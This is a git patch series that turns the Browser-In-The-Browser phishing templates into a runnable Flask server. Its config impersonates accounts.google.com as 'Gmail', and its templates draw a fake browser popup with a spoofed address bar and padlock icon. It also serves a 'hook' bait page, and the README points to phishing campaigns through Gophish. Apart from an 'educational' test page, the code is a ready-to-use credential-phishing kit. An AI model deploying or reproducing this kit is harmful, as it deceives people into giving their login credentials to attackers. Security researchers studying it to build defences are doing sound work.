From 46b24c06cb56b58ea011550b35ba688a77f18c8c Mon Sep 17 00:00:00 2001 From: julio Date: Sat, 26 Mar 2022 19:15:55 -0300 Subject: [PATCH 1/2] feat: flask app for BITB --- .vscode/settings.json | 3 + README.md | 42 ++++++++---- Windows-Chrome-DarkMode/index.html | 37 ----------- Windows-Chrome-LightMode/index.html | 37 ----------- Windows-DarkMode-Delay/index.html | 38 ----------- bitb_server/app.py | 4 ++ bitb_server/config.py | 6 ++ bitb_server/main.py | 5 ++ bitb_server/phishing.ini | 5 ++ bitb_server/requirements.txt | 1 + .../static/common/assets}/logo.svg | 0 .../static/common/assets}/ssl.svg | 0 .../static/common/js}/script.js | 0 bitb_server/static/common/js/styles.css | 3 + bitb_server/static/css/styles.css | 3 + .../static/js}/script.js | 0 .../phishing/MacOS-Chrome-DarkMode}/logo.svg | 0 .../phishing/MacOS-Chrome-DarkMode/script.js | 60 ++++++++++++++++++ .../phishing/MacOS-Chrome-DarkMode}/ssl.svg | 0 .../phishing/MacOS-Chrome-DarkMode}/style.css | 0 .../phishing/MacOS-Chrome-LightMode}/logo.svg | 0 .../phishing/MacOS-Chrome-LightMode/script.js | 60 ++++++++++++++++++ .../phishing/MacOS-Chrome-LightMode}/ssl.svg | 0 .../MacOS-Chrome-LightMode}/style.css | 0 .../Windows-Chrome-DarkMode}/login.png | Bin .../Windows-Chrome-DarkMode}/logo.svg | 0 .../Windows-Chrome-DarkMode}/script.js | 0 .../phishing/Windows-Chrome-DarkMode}/ssl.svg | 0 .../Windows-Chrome-DarkMode}/style.css | 0 .../Windows-Chrome-LightMode}/logo.svg | 0 .../Windows-Chrome-LightMode}/script.js | 0 .../Windows-Chrome-LightMode}/ssl.svg | 0 .../Windows-Chrome-LightMode}/style.css | 0 .../Windows-DarkMode-Delay}/login.png | Bin .../phishing/Windows-DarkMode-Delay/logo.svg | 1 + .../Windows-DarkMode-Delay}/script.js | 0 .../phishing/Windows-DarkMode-Delay/ssl.svg | 4 ++ .../Windows-DarkMode-Delay}/style.css | 0 bitb_server/templates/hook/index.html | 13 ++++ .../MacOS-Chrome-DarkMode}/index.html | 14 ++-- .../MacOS-Chrome-LightMode}/index.html | 14 ++-- .../Windows-Chrome-DarkMode/index.html | 38 +++++++++++ .../Windows-Chrome-DarkMode/login.png | Bin 0 -> 1886 bytes .../phishing/Windows-Chrome-DarkMode/logo.svg | 1 + .../Windows-Chrome-LightMode/index.html | 38 +++++++++++ .../Windows-DarkMode-Delay/index.html | 38 +++++++++++ bitb_server/templates/test/index.html | 40 ++++++++++++ bitb_server/views.py | 37 +++++++++++ 48 files changed, 404 insertions(+), 138 deletions(-) create mode 100644 .vscode/settings.json delete mode 100644 Windows-Chrome-DarkMode/index.html delete mode 100644 Windows-Chrome-LightMode/index.html delete mode 100644 Windows-DarkMode-Delay/index.html create mode 100644 bitb_server/app.py create mode 100644 bitb_server/config.py create mode 100644 bitb_server/main.py create mode 100644 bitb_server/phishing.ini create mode 100644 bitb_server/requirements.txt rename {MacOS-Chrome-DarkMode => bitb_server/static/common/assets}/logo.svg (100%) rename {MacOS-Chrome-DarkMode => bitb_server/static/common/assets}/ssl.svg (100%) rename {MacOS-Chrome-DarkMode => bitb_server/static/common/js}/script.js (100%) create mode 100644 bitb_server/static/common/js/styles.css create mode 100644 bitb_server/static/css/styles.css rename {MacOS-Chrome-LightMode => bitb_server/static/js}/script.js (100%) rename {MacOS-Chrome-LightMode => bitb_server/static/phishing/MacOS-Chrome-DarkMode}/logo.svg (100%) create mode 100644 bitb_server/static/phishing/MacOS-Chrome-DarkMode/script.js rename {MacOS-Chrome-LightMode => bitb_server/static/phishing/MacOS-Chrome-DarkMode}/ssl.svg (100%) rename {MacOS-Chrome-DarkMode => bitb_server/static/phishing/MacOS-Chrome-DarkMode}/style.css (100%) rename {Windows-Chrome-DarkMode => bitb_server/static/phishing/MacOS-Chrome-LightMode}/logo.svg (100%) create mode 100644 bitb_server/static/phishing/MacOS-Chrome-LightMode/script.js rename {Windows-Chrome-DarkMode => bitb_server/static/phishing/MacOS-Chrome-LightMode}/ssl.svg (100%) rename {MacOS-Chrome-LightMode => bitb_server/static/phishing/MacOS-Chrome-LightMode}/style.css (100%) rename {Windows-Chrome-DarkMode => bitb_server/static/phishing/Windows-Chrome-DarkMode}/login.png (100%) rename {Windows-Chrome-LightMode => bitb_server/static/phishing/Windows-Chrome-DarkMode}/logo.svg (100%) rename {Windows-Chrome-DarkMode => bitb_server/static/phishing/Windows-Chrome-DarkMode}/script.js (100%) rename {Windows-Chrome-LightMode => bitb_server/static/phishing/Windows-Chrome-DarkMode}/ssl.svg (100%) rename {Windows-Chrome-DarkMode => bitb_server/static/phishing/Windows-Chrome-DarkMode}/style.css (100%) rename {Windows-DarkMode-Delay => bitb_server/static/phishing/Windows-Chrome-LightMode}/logo.svg (100%) rename {Windows-Chrome-LightMode => bitb_server/static/phishing/Windows-Chrome-LightMode}/script.js (100%) rename {Windows-DarkMode-Delay => bitb_server/static/phishing/Windows-Chrome-LightMode}/ssl.svg (100%) rename {Windows-Chrome-LightMode => bitb_server/static/phishing/Windows-Chrome-LightMode}/style.css (100%) rename {Windows-DarkMode-Delay => bitb_server/static/phishing/Windows-DarkMode-Delay}/login.png (100%) create mode 100644 bitb_server/static/phishing/Windows-DarkMode-Delay/logo.svg rename {Windows-DarkMode-Delay => bitb_server/static/phishing/Windows-DarkMode-Delay}/script.js (100%) create mode 100644 bitb_server/static/phishing/Windows-DarkMode-Delay/ssl.svg rename {Windows-DarkMode-Delay => bitb_server/static/phishing/Windows-DarkMode-Delay}/style.css (100%) create mode 100644 bitb_server/templates/hook/index.html rename {MacOS-Chrome-DarkMode => bitb_server/templates/phishing/MacOS-Chrome-DarkMode}/index.html (52%) rename {MacOS-Chrome-LightMode => bitb_server/templates/phishing/MacOS-Chrome-LightMode}/index.html (52%) create mode 100644 bitb_server/templates/phishing/Windows-Chrome-DarkMode/index.html create mode 100644 bitb_server/templates/phishing/Windows-Chrome-DarkMode/login.png create mode 100644 bitb_server/templates/phishing/Windows-Chrome-DarkMode/logo.svg create mode 100644 bitb_server/templates/phishing/Windows-Chrome-LightMode/index.html create mode 100644 bitb_server/templates/phishing/Windows-DarkMode-Delay/index.html create mode 100644 bitb_server/templates/test/index.html create mode 100644 bitb_server/views.py diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100644 index 0000000..5c00f7e --- /dev/null +++ b/.vscode/settings.json @@ -0,0 +1,3 @@ +{ + "vscode-corda.isCordaProject": false +} \ No newline at end of file diff --git a/README.md b/README.md index 09c8ad2..f7ac5a2 100644 --- a/README.md +++ b/README.md @@ -1,27 +1,45 @@ -# BITB -Browser templates for Browser In The Browser (BITB) attack. +# BITB Server + +Flask application for Browser In The Browser (BITB) attack. + +It's a Fork of https://github.com/mrd0x/BITB More information: https://mrd0x.com/browser-in-the-browser-phishing-attack/ + +# Requirements +pip3 install -r requirements.txt + # Usage -Each folder has a `index.html` file which has 4 variables that must be modified: +phishing.ini file has 4 variables that must be modified: -* **XX-TITLE-XX** - The title that shows up for the page (e.g. Sign in to your account now) -* **XX-DOMAIN-NAME-XX** - Domain name you're masquerading as. (e.g. gmail.com) -* **XX-DOMAIN-PATH-XX** - Domain path (e.g. /auth/google/login) -* **XX-PHISHING-LINK-XX** - Phishing link which will be embedded into the iFrame (e.g. https://example.com) +* **PHISHING_TITLE** - The title that shows up for the page (e.g. Sign in to your account now) +* **DOMAIN_NAME** - Domain name you're masquerading as. (e.g. gmail.com) +* **DOMAIN_PATH** - Domain path (e.g. /auth/google/login) +* **BITB_TEMPLATE** * - Look alike browser template name (e.g. Windows-DarkMode-Delay) -Furthermore, if you're using a Windows template you should update the `logo.svg` which is the icon of the website you're masquerading as. The default logo is Microsoft. +DOMAIN_NAME = https://gmail.com +DOMAIN_PATH = /login +PHISHING_TITLE = Gmail +BITB_TEMPLATE = Windows-DarkMode-Delay +# Run the Flask app -# Windows-DarkMode-Delay +```bash -The Windows-DarkMode-Delay folder makes use of jQuery's fadeIn() function to add a slight delay to the pop-up window as it appears. This is only one way of making the Window appear in a delayed fashion, there's various other ways to do the same. +cd bitb_server +python3 main.py + +``` + +Furthermore, if you're using a Windows template you should update the `logo.svg` which is the icon of the website you're masquerading as. The default logo is Microsoft. +# Integration -# Demo +You can use this with https://getgophish.com/ leverage your campaings +# Windows-DarkMode-Delay -![Demo](https://github.com/mrd0x/BITB/blob/main/demo.gif) +The Windows-DarkMode-Delay folder makes use of jQuery's fadeIn() function to add a slight delay to the pop-up window as it appears. This is only one way of making the Window appear in a delayed fashion, there's various other ways to do the same. # Detecting Color Preference diff --git a/Windows-Chrome-DarkMode/index.html b/Windows-Chrome-DarkMode/index.html deleted file mode 100644 index 5acce0d..0000000 --- a/Windows-Chrome-DarkMode/index.html +++ /dev/null @@ -1,37 +0,0 @@ - - - - - - - - - -
- -
-
-
- - XX-TITLE-XX -
- -
- - - -
-
-
- - XX-DOMAIN-NAME-XX - XX-DOMAIN-PATH-XX -
-
- - -
- - - - diff --git a/Windows-Chrome-LightMode/index.html b/Windows-Chrome-LightMode/index.html deleted file mode 100644 index 5acce0d..0000000 --- a/Windows-Chrome-LightMode/index.html +++ /dev/null @@ -1,37 +0,0 @@ - - - - - - - - - -
- -
-
-
- - XX-TITLE-XX -
- -
- - - -
-
-
- - XX-DOMAIN-NAME-XX - XX-DOMAIN-PATH-XX -
-
- - -
- - - - diff --git a/Windows-DarkMode-Delay/index.html b/Windows-DarkMode-Delay/index.html deleted file mode 100644 index 22c252f..0000000 --- a/Windows-DarkMode-Delay/index.html +++ /dev/null @@ -1,38 +0,0 @@ - - - - - - - - - - - - - - - diff --git a/bitb_server/app.py b/bitb_server/app.py new file mode 100644 index 0000000..47c47e6 --- /dev/null +++ b/bitb_server/app.py @@ -0,0 +1,4 @@ +from flask import Flask + +app = Flask(__name__, static_url_path="/static", static_folder="static") +app.config.from_object("config.DevelopmentConfig") diff --git a/bitb_server/config.py b/bitb_server/config.py new file mode 100644 index 0000000..50bb22a --- /dev/null +++ b/bitb_server/config.py @@ -0,0 +1,6 @@ +class Config(object): + DEBUG = False + TESTING = False + +class DevelopmentConfig(Config): + DEBUG = True diff --git a/bitb_server/main.py b/bitb_server/main.py new file mode 100644 index 0000000..1613ecd --- /dev/null +++ b/bitb_server/main.py @@ -0,0 +1,5 @@ +from app import app +from views import * + +if __name__ == "__main__": + app.run() diff --git a/bitb_server/phishing.ini b/bitb_server/phishing.ini new file mode 100644 index 0000000..a8ad02c --- /dev/null +++ b/bitb_server/phishing.ini @@ -0,0 +1,5 @@ +[phishing] +DOMAIN_NAME = https://accounts.google.com +DOMAIN_PATH = /login +PHISHING_TITLE = Gmail +BITB_TEMPLATE = Windows-DarkMode-Delay \ No newline at end of file diff --git a/bitb_server/requirements.txt b/bitb_server/requirements.txt new file mode 100644 index 0000000..0f2af12 --- /dev/null +++ b/bitb_server/requirements.txt @@ -0,0 +1 @@ +Flask==1.1.1 \ No newline at end of file diff --git a/MacOS-Chrome-DarkMode/logo.svg b/bitb_server/static/common/assets/logo.svg similarity index 100% rename from MacOS-Chrome-DarkMode/logo.svg rename to bitb_server/static/common/assets/logo.svg diff --git a/MacOS-Chrome-DarkMode/ssl.svg b/bitb_server/static/common/assets/ssl.svg similarity index 100% rename from MacOS-Chrome-DarkMode/ssl.svg rename to bitb_server/static/common/assets/ssl.svg diff --git a/MacOS-Chrome-DarkMode/script.js b/bitb_server/static/common/js/script.js similarity index 100% rename from MacOS-Chrome-DarkMode/script.js rename to bitb_server/static/common/js/script.js diff --git a/bitb_server/static/common/js/styles.css b/bitb_server/static/common/js/styles.css new file mode 100644 index 0000000..e6a5578 --- /dev/null +++ b/bitb_server/static/common/js/styles.css @@ -0,0 +1,3 @@ +body { + background-color: black; +} \ No newline at end of file diff --git a/bitb_server/static/css/styles.css b/bitb_server/static/css/styles.css new file mode 100644 index 0000000..e6a5578 --- /dev/null +++ b/bitb_server/static/css/styles.css @@ -0,0 +1,3 @@ +body { + background-color: black; +} \ No newline at end of file diff --git a/MacOS-Chrome-LightMode/script.js b/bitb_server/static/js/script.js similarity index 100% rename from MacOS-Chrome-LightMode/script.js rename to bitb_server/static/js/script.js diff --git a/MacOS-Chrome-LightMode/logo.svg b/bitb_server/static/phishing/MacOS-Chrome-DarkMode/logo.svg similarity index 100% rename from MacOS-Chrome-LightMode/logo.svg rename to bitb_server/static/phishing/MacOS-Chrome-DarkMode/logo.svg diff --git a/bitb_server/static/phishing/MacOS-Chrome-DarkMode/script.js b/bitb_server/static/phishing/MacOS-Chrome-DarkMode/script.js new file mode 100644 index 0000000..6eac59e --- /dev/null +++ b/bitb_server/static/phishing/MacOS-Chrome-DarkMode/script.js @@ -0,0 +1,60 @@ +var titleBar = document.getElementById("title-bar"); +var exit = document.getElementById("exit"); +var max = document.getElementById("maximize"); +var min = document.getElementById("minimize"); + +titleBar.addEventListener('mouseover', function handleMouseOver() { + titleBar.style.cursor = 'context-menu'; +}); + +titleBar.addEventListener('mouseout', function handleMouseOver() { + titleBar.style.cursor = 'default'; +}); + +//////////////// Make window draggable start //////////////// +// Make the DIV element draggable: +var draggable = $('#window'); +var title = $('#title-bar'); + +title.on('mousedown', function(e){ + var dr = $(draggable).addClass("drag"); + height = dr.outerHeight(); + width = dr.outerWidth(); + ypos = dr.offset().top + height - e.pageY, + xpos = dr.offset().left + width - e.pageX; + $(document.body).on('mousemove', function(e){ + var itop = e.pageY + ypos - height; + var ileft = e.pageX + xpos - width; + if(dr.hasClass("drag")){ + dr.offset({top: itop,left: ileft}); + } + }).on('mouseup', function(e){ + dr.removeClass("drag"); + }); +}); +//////////////// Make window draggable end //////////////// + + +////////////////// Onclick listeners ////////////////// +// X button functionality +$("#exit").click(function(){ + $("#window").css("display", "none"); + }); + +// Maximize button functionality +$("#maximize").click(enlarge); + +function enlarge(){ + if(max.classList.contains("enlarged")){ + $("#window").css("width", "40%"); + $("#title-bar-width").css('width', '100%').css('width', '+=2px'); + $("#content").css("width", "100%"); + $("#maximize").removeClass("enlarged"); + } + else{ + $("#window").css("width", "70%"); + $("#title-bar-width").css('width', '100%').css('width', '+=2px'); + $("#content").css("width", "100%"); + $("#maximize").addClass("enlarged"); + } +} \ No newline at end of file diff --git a/MacOS-Chrome-LightMode/ssl.svg b/bitb_server/static/phishing/MacOS-Chrome-DarkMode/ssl.svg similarity index 100% rename from MacOS-Chrome-LightMode/ssl.svg rename to bitb_server/static/phishing/MacOS-Chrome-DarkMode/ssl.svg diff --git a/MacOS-Chrome-DarkMode/style.css b/bitb_server/static/phishing/MacOS-Chrome-DarkMode/style.css similarity index 100% rename from MacOS-Chrome-DarkMode/style.css rename to bitb_server/static/phishing/MacOS-Chrome-DarkMode/style.css diff --git a/Windows-Chrome-DarkMode/logo.svg b/bitb_server/static/phishing/MacOS-Chrome-LightMode/logo.svg similarity index 100% rename from Windows-Chrome-DarkMode/logo.svg rename to bitb_server/static/phishing/MacOS-Chrome-LightMode/logo.svg diff --git a/bitb_server/static/phishing/MacOS-Chrome-LightMode/script.js b/bitb_server/static/phishing/MacOS-Chrome-LightMode/script.js new file mode 100644 index 0000000..6eac59e --- /dev/null +++ b/bitb_server/static/phishing/MacOS-Chrome-LightMode/script.js @@ -0,0 +1,60 @@ +var titleBar = document.getElementById("title-bar"); +var exit = document.getElementById("exit"); +var max = document.getElementById("maximize"); +var min = document.getElementById("minimize"); + +titleBar.addEventListener('mouseover', function handleMouseOver() { + titleBar.style.cursor = 'context-menu'; +}); + +titleBar.addEventListener('mouseout', function handleMouseOver() { + titleBar.style.cursor = 'default'; +}); + +//////////////// Make window draggable start //////////////// +// Make the DIV element draggable: +var draggable = $('#window'); +var title = $('#title-bar'); + +title.on('mousedown', function(e){ + var dr = $(draggable).addClass("drag"); + height = dr.outerHeight(); + width = dr.outerWidth(); + ypos = dr.offset().top + height - e.pageY, + xpos = dr.offset().left + width - e.pageX; + $(document.body).on('mousemove', function(e){ + var itop = e.pageY + ypos - height; + var ileft = e.pageX + xpos - width; + if(dr.hasClass("drag")){ + dr.offset({top: itop,left: ileft}); + } + }).on('mouseup', function(e){ + dr.removeClass("drag"); + }); +}); +//////////////// Make window draggable end //////////////// + + +////////////////// Onclick listeners ////////////////// +// X button functionality +$("#exit").click(function(){ + $("#window").css("display", "none"); + }); + +// Maximize button functionality +$("#maximize").click(enlarge); + +function enlarge(){ + if(max.classList.contains("enlarged")){ + $("#window").css("width", "40%"); + $("#title-bar-width").css('width', '100%').css('width', '+=2px'); + $("#content").css("width", "100%"); + $("#maximize").removeClass("enlarged"); + } + else{ + $("#window").css("width", "70%"); + $("#title-bar-width").css('width', '100%').css('width', '+=2px'); + $("#content").css("width", "100%"); + $("#maximize").addClass("enlarged"); + } +} \ No newline at end of file diff --git a/Windows-Chrome-DarkMode/ssl.svg b/bitb_server/static/phishing/MacOS-Chrome-LightMode/ssl.svg similarity index 100% rename from Windows-Chrome-DarkMode/ssl.svg rename to bitb_server/static/phishing/MacOS-Chrome-LightMode/ssl.svg diff --git a/MacOS-Chrome-LightMode/style.css b/bitb_server/static/phishing/MacOS-Chrome-LightMode/style.css similarity index 100% rename from MacOS-Chrome-LightMode/style.css rename to bitb_server/static/phishing/MacOS-Chrome-LightMode/style.css diff --git a/Windows-Chrome-DarkMode/login.png b/bitb_server/static/phishing/Windows-Chrome-DarkMode/login.png similarity index 100% rename from Windows-Chrome-DarkMode/login.png rename to bitb_server/static/phishing/Windows-Chrome-DarkMode/login.png diff --git a/Windows-Chrome-LightMode/logo.svg b/bitb_server/static/phishing/Windows-Chrome-DarkMode/logo.svg similarity index 100% rename from Windows-Chrome-LightMode/logo.svg rename to bitb_server/static/phishing/Windows-Chrome-DarkMode/logo.svg diff --git a/Windows-Chrome-DarkMode/script.js b/bitb_server/static/phishing/Windows-Chrome-DarkMode/script.js similarity index 100% rename from Windows-Chrome-DarkMode/script.js rename to bitb_server/static/phishing/Windows-Chrome-DarkMode/script.js diff --git a/Windows-Chrome-LightMode/ssl.svg b/bitb_server/static/phishing/Windows-Chrome-DarkMode/ssl.svg similarity index 100% rename from Windows-Chrome-LightMode/ssl.svg rename to bitb_server/static/phishing/Windows-Chrome-DarkMode/ssl.svg diff --git a/Windows-Chrome-DarkMode/style.css b/bitb_server/static/phishing/Windows-Chrome-DarkMode/style.css similarity index 100% rename from Windows-Chrome-DarkMode/style.css rename to bitb_server/static/phishing/Windows-Chrome-DarkMode/style.css diff --git a/Windows-DarkMode-Delay/logo.svg b/bitb_server/static/phishing/Windows-Chrome-LightMode/logo.svg similarity index 100% rename from Windows-DarkMode-Delay/logo.svg rename to bitb_server/static/phishing/Windows-Chrome-LightMode/logo.svg diff --git a/Windows-Chrome-LightMode/script.js b/bitb_server/static/phishing/Windows-Chrome-LightMode/script.js similarity index 100% rename from Windows-Chrome-LightMode/script.js rename to bitb_server/static/phishing/Windows-Chrome-LightMode/script.js diff --git a/Windows-DarkMode-Delay/ssl.svg b/bitb_server/static/phishing/Windows-Chrome-LightMode/ssl.svg similarity index 100% rename from Windows-DarkMode-Delay/ssl.svg rename to bitb_server/static/phishing/Windows-Chrome-LightMode/ssl.svg diff --git a/Windows-Chrome-LightMode/style.css b/bitb_server/static/phishing/Windows-Chrome-LightMode/style.css similarity index 100% rename from Windows-Chrome-LightMode/style.css rename to bitb_server/static/phishing/Windows-Chrome-LightMode/style.css diff --git a/Windows-DarkMode-Delay/login.png b/bitb_server/static/phishing/Windows-DarkMode-Delay/login.png similarity index 100% rename from Windows-DarkMode-Delay/login.png rename to bitb_server/static/phishing/Windows-DarkMode-Delay/login.png diff --git a/bitb_server/static/phishing/Windows-DarkMode-Delay/logo.svg b/bitb_server/static/phishing/Windows-DarkMode-Delay/logo.svg new file mode 100644 index 0000000..89f6237 --- /dev/null +++ b/bitb_server/static/phishing/Windows-DarkMode-Delay/logo.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/Windows-DarkMode-Delay/script.js b/bitb_server/static/phishing/Windows-DarkMode-Delay/script.js similarity index 100% rename from Windows-DarkMode-Delay/script.js rename to bitb_server/static/phishing/Windows-DarkMode-Delay/script.js diff --git a/bitb_server/static/phishing/Windows-DarkMode-Delay/ssl.svg b/bitb_server/static/phishing/Windows-DarkMode-Delay/ssl.svg new file mode 100644 index 0000000..6cff84c --- /dev/null +++ b/bitb_server/static/phishing/Windows-DarkMode-Delay/ssl.svg @@ -0,0 +1,4 @@ + + + + diff --git a/Windows-DarkMode-Delay/style.css b/bitb_server/static/phishing/Windows-DarkMode-Delay/style.css similarity index 100% rename from Windows-DarkMode-Delay/style.css rename to bitb_server/static/phishing/Windows-DarkMode-Delay/style.css diff --git a/bitb_server/templates/hook/index.html b/bitb_server/templates/hook/index.html new file mode 100644 index 0000000..4c4c5be --- /dev/null +++ b/bitb_server/templates/hook/index.html @@ -0,0 +1,13 @@ + + + + + + + Hook + + +

Hook

+

Insert your bait here

+ + \ No newline at end of file diff --git a/MacOS-Chrome-DarkMode/index.html b/bitb_server/templates/phishing/MacOS-Chrome-DarkMode/index.html similarity index 52% rename from MacOS-Chrome-DarkMode/index.html rename to bitb_server/templates/phishing/MacOS-Chrome-DarkMode/index.html index 4584284..c52444c 100644 --- a/MacOS-Chrome-DarkMode/index.html +++ b/bitb_server/templates/phishing/MacOS-Chrome-DarkMode/index.html @@ -3,7 +3,7 @@ - + @@ -17,18 +17,18 @@
- XX-TITLE-XX + {{ phishing_title }}
- - XX-DOMAIN-NAME-XX - XX-DOMAIN-PATH-XX + + {{ domain_name }} + {{ domain_path }}
- + - + diff --git a/MacOS-Chrome-LightMode/index.html b/bitb_server/templates/phishing/MacOS-Chrome-LightMode/index.html similarity index 52% rename from MacOS-Chrome-LightMode/index.html rename to bitb_server/templates/phishing/MacOS-Chrome-LightMode/index.html index 4584284..c52444c 100644 --- a/MacOS-Chrome-LightMode/index.html +++ b/bitb_server/templates/phishing/MacOS-Chrome-LightMode/index.html @@ -3,7 +3,7 @@ - + @@ -17,18 +17,18 @@
- XX-TITLE-XX + {{ phishing_title }}
- - XX-DOMAIN-NAME-XX - XX-DOMAIN-PATH-XX + + {{ domain_name }} + {{ domain_path }}
- + - + diff --git a/bitb_server/templates/phishing/Windows-Chrome-DarkMode/index.html b/bitb_server/templates/phishing/Windows-Chrome-DarkMode/index.html new file mode 100644 index 0000000..c436ff5 --- /dev/null +++ b/bitb_server/templates/phishing/Windows-Chrome-DarkMode/index.html @@ -0,0 +1,38 @@ + + + + + + + + + +
+ +
+
+
+ + {{ phishing_title }} +
+ +
+ + + +
+
+
+ + {{ domain_name }} + {{ domain_path }} +
+
+ + +
+ + + + + diff --git a/bitb_server/templates/phishing/Windows-Chrome-DarkMode/login.png b/bitb_server/templates/phishing/Windows-Chrome-DarkMode/login.png new file mode 100644 index 0000000000000000000000000000000000000000..dbe5900cf103de99c0adf94a7565cdde966871dc GIT binary patch literal 1886 zcmZ`)do&Y@1Ky%}<;IrxBJy?{qE%?fup!E`NT@4BH?|OCqlO7-DU0ET|#Gka6~-IE^dQOYj{fI;@J$TsG1u%hfIBEtbTIYFJ& z7U~MhQiBEjpBTHJU83?4_K%N)t#M{M#m5^?ge@*CZ1k(7p2N1A7N|NvT`s1|OF;^P zkX`SBmB}ViDh}HJ5v4CzSH*}#LruZ>&4!O#Ry**wlgl2b;BOc^V85n)hrznAZW6LP zqo%H|Zhi6RPuL|5RaK0KhX?b^b6HliKBKpn-Pebro^f_|4%sA21kd&U?x{<83&m}R zvskRwEaOY9Tzr#$H48f?wvU^u=Qf#VnZ;V< z^ZAqW^YbdWQbeM!M1xid1#q9|R~v?k(vc9ZEsaxaYWmsji7n?-rMmv^1uH@i9&Fm! zh_kj)0{*bN#qD@oE@hjvu)J&x%JVg`vPy8hxUNV@Bl1VhcoOwqwkD~Z9P@G->BK(X z!a`N{<1lT#G$WEb)6h-s!Lx+Y8E5+lcYS1%WVk&hWx%gQ(xlb!jHYJw?H9AvnKo#dvM$_~)YNY{sC%ZC^~|Ib7J*gO5*Y^C*jB!}VdB_rcSn=D_+_ zK(HlZu^y^Hp}aDA?v_YkX3sd~lv^Jh6~#QL zp&{bDP+Kpt$bo>0OHbjxeNk3c=8jJole+@N1TSRs$XOGVA)A(F7-?cLO*r7>CmqrI zC!Z`0<;et$?60^Nw9_3kGQ5_OvUkV*!dUk))-B#VS?MM!)aZ@=N2P1o98{Pcb3}q6 z<~LgqN$EnAZ`695&nAN)iQ(b>1jb2H<*0*|%i*H(ebvM~P_$|N>rU+;u3>U~`s2|~ z8?(Z&lh*QzxKO)uqQMf&ZT~H%sK3B?i0x)g<0$Oe!?Ba|zI9M-Rg1s6`ielu3I1Gp zI9zS6HoWOVmRaljGWBVCuhJmWs!jeG$KTCuD`RFyE)Ib5}w568sOE$bS| z9)x)aqK-nD71nxtHeyziXwb`uL#2-%@zlI@fp=2+UTHN9qd+Jlaf2?QF#Z}Fi^U>p z%Ln-Um`cfC-#u8r)>p0&`tE}u`RU~f=OMYVy7}+&-e3$-XY`WE4g`?F+N;A(?;Znmt)I)Q7lzt*x%!KE3%LR*xZd?(mj_?bJV_bCQtT_>_uid# zR2u9F$!WJaPaW!855K11_-`Wi_QmahP@b!gu}y`7h3s_7vm8289EHXB-SeMP_dJcp$E0{=d7MI~hRR*gAE>vQsouIoIn2lGj%@0@ zR?EBFSe@$F<*y}1b@LUTy$Tp%ye-Z$V&>(Z+&$#?jMlsk9q(k{j>S1?kt5M-5Se#= z!fxTEm^R%6OuKXQh zzQmjUAqvdW(h?uxbP!ISZt9wnA=ui+iPtJX<*Q)7Ip17QjvQ6LGK6rRQT?kpW!Qhy zfo;0}rlH~2xYN=Wx7)ZW*dmsIov}{rJMxz67}CSmnoisjjvYI8Y(ugqWBvo$z3`d| z;9=oVnYDo9=j%J!o2`*(Se58XV^${-d3WnJPl}R zX({5L4RLf#D~oh_ot2ekmbl;N(d%%{sbz~yrZ#M>;FCIQd?Jwk+o92`!v%VJdfT{N zMCm-+{QmuWQDQh2+psf$kGXo4@x{S12shckoO#`#th2MzmU(015PdACdOM?K4fFV% z)cdrj@eCsN2D>?06Rup4k%}i>l(G`o1kNtB8r2#9b6~)vdTN-I0add#& \ No newline at end of file diff --git a/bitb_server/templates/phishing/Windows-Chrome-LightMode/index.html b/bitb_server/templates/phishing/Windows-Chrome-LightMode/index.html new file mode 100644 index 0000000..c7cc1d8 --- /dev/null +++ b/bitb_server/templates/phishing/Windows-Chrome-LightMode/index.html @@ -0,0 +1,38 @@ + + + + + + + + + +
+ +
+
+
+ + {{ phishing_title }} +
+ +
+ + + +
+
+
+ + {{ domain_name }} + {{ domain_path }} +
+
+ + +
+ + + + + diff --git a/bitb_server/templates/phishing/Windows-DarkMode-Delay/index.html b/bitb_server/templates/phishing/Windows-DarkMode-Delay/index.html new file mode 100644 index 0000000..0cc0cc3 --- /dev/null +++ b/bitb_server/templates/phishing/Windows-DarkMode-Delay/index.html @@ -0,0 +1,38 @@ + + + + + + + + + + + + + + + diff --git a/bitb_server/templates/test/index.html b/bitb_server/templates/test/index.html new file mode 100644 index 0000000..6ccbbb3 --- /dev/null +++ b/bitb_server/templates/test/index.html @@ -0,0 +1,40 @@ + + + + + + + + BITB Server [TEST] + + + +

For Educational Purposes Only

+ TEST + + + + + \ No newline at end of file diff --git a/bitb_server/views.py b/bitb_server/views.py new file mode 100644 index 0000000..5952629 --- /dev/null +++ b/bitb_server/views.py @@ -0,0 +1,37 @@ +import configparser +from app import app +from flask.templating import render_template + +HOOK_LINK = "/hook" +PHISHING_SETUP = configparser.ConfigParser() +PHISHING_SETUP.read("./phishing.ini") + + +@app.route("/", methods=["GET"]) +def phishing(): + hook_link = HOOK_LINK + template_static_dir = PHISHING_SETUP.get("phishing", "BITB_TEMPLATE") + domain_name = PHISHING_SETUP.get("phishing", "DOMAIN_NAME") + domain_path = PHISHING_SETUP.get("phishing", "DOMAIN_PATH") + phishing_title = PHISHING_SETUP.get("phishing", "PHISHING_TITLE") + template = f"phishing/{template_static_dir}/index.html" + return render_template( + template, + phishing_title=phishing_title, + template_static_dir=template_static_dir, + hook_link=hook_link, + domain_name=domain_name, + domain_path=domain_path, + ) + + +@app.route(HOOK_LINK, methods=["GET"]) +def hook(): + template = f"hook/index.html" + return render_template(template) + + +@app.route("/test", methods=["GET"]) +def test(): + template = f"test/index.html" + return render_template(template) From b9941c4c38b2ad11c58027970025f78f8f32caeb Mon Sep 17 00:00:00 2001 From: julio Date: Sat, 26 Mar 2022 19:21:51 -0300 Subject: [PATCH 2/2] chore: add the test URL --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index f7ac5a2..874f8d5 100644 --- a/README.md +++ b/README.md @@ -33,6 +33,8 @@ python3 main.py ``` +Open the browser and go to http://localhost:5000/test and you see a live test page. + Furthermore, if you're using a Windows template you should update the `logo.svg` which is the icon of the website you're masquerading as. The default logo is Microsoft. # Integration